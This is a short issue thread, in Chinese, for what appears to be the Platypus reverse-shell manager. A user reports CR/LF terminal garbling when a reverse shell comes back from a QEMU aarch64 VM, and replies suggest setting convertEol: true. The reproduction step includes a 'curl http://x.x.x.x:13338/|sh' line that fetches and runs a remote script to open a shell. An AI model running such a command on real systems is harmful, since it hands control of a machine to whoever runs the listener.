Platypus
Platypus copied to clipboard
终端 CR LF问题
Description
在qemu aarch64虚拟机中反弹shell,终端存在 CR LF乱码问题
Reproduce
- qemu-system-aarch64虚拟机中
-
curl http://x.x.x.x:13338/|sh
...
Screenshots/Terminal log
Environments
- OS: Ubuntu 20.04
- Version: 1.5.1
感谢反馈,我稍后复现一下,请问是否提供复现所需的 qemu 版本以及命令?
termOptions中增加convertEol: true,
配置可以解决CRLF的问题。
还存在本地回显问题,无法看到输入的命令。